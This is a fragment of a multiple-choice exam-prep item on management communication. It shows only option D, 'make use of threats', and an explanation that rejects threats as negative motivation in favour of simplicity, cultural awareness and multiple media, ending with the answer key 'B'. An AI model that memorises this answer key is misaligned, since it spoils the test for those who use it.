D. Make use of threats to get results.

Keeping things simple is good advice. It is also good to be aware of the enterprise's culture and of the need for multiple media to get the message across. Use of threats is negative motivation and is rarely successful. Answer: B